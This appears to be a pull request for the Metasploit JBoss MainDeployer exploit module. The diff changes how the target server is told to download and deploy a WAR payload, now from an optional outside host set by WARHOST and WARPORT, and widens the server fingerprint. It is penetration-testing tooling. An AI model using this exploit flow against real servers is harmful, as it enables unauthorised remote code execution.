### PR TITLE
jboss_maindeployer WARHOST program flow

### DIFF
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
-	HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }
+	HttpFingerprint = { :pattern => [ /(Jetty|JBoss|coyote)/ ] }
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Remote::HttpServer
@@ -90,6 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('APPBASE',  [ false, 'Application base name, (default: random)', nil ]),
 				OptString.new('PATH',     [ true,  'The URI path of the console', '/jmx-console' ]),
 				OptString.new('WARHOST',  [ false, 'The host to request the WAR payload from' ]),
+				OptString.new('WARPORT',  [ false, 'The port to request the WAR payload from' ], 80),
 				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine' ]),
 				OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])
 
@@ -156,17 +157,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		# UPLOAD
 		#
 		resource_uri = '/' + app_base + '.war'
-		service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-		print_status("Starting up our web service on #{service_url} ...")
-		start_service({'Uri' => {
-				'Proc' => Proc.new { |cli, req|
-					on_request_uri(cli, req)
-				},
-				'Path' => resource_uri
-			}})
-
 		if (datastore['WARHOST'])
-			service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+			service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['WARPORT'].to_s + resource_uri	
+			print_status("Using #{service_url} as our web service")	
+		else
+			service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+			print_status("Starting up our web service on #{service_url} ...")
+			start_service({'Uri' => {
+					'Proc' => Proc.new { |cli, req|
+						on_request_uri(cli, req)
+					},
+					'Path' => resource_uri
+				}})
 		end
 
 		print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")


### PR DESCRIPTION
Module was causing server errors when attempting to set a WARHOST that was the same as the local host, for the need to send a custom WAR file

Also updated HTTPFingerprint for another server type that was found on a recent test.
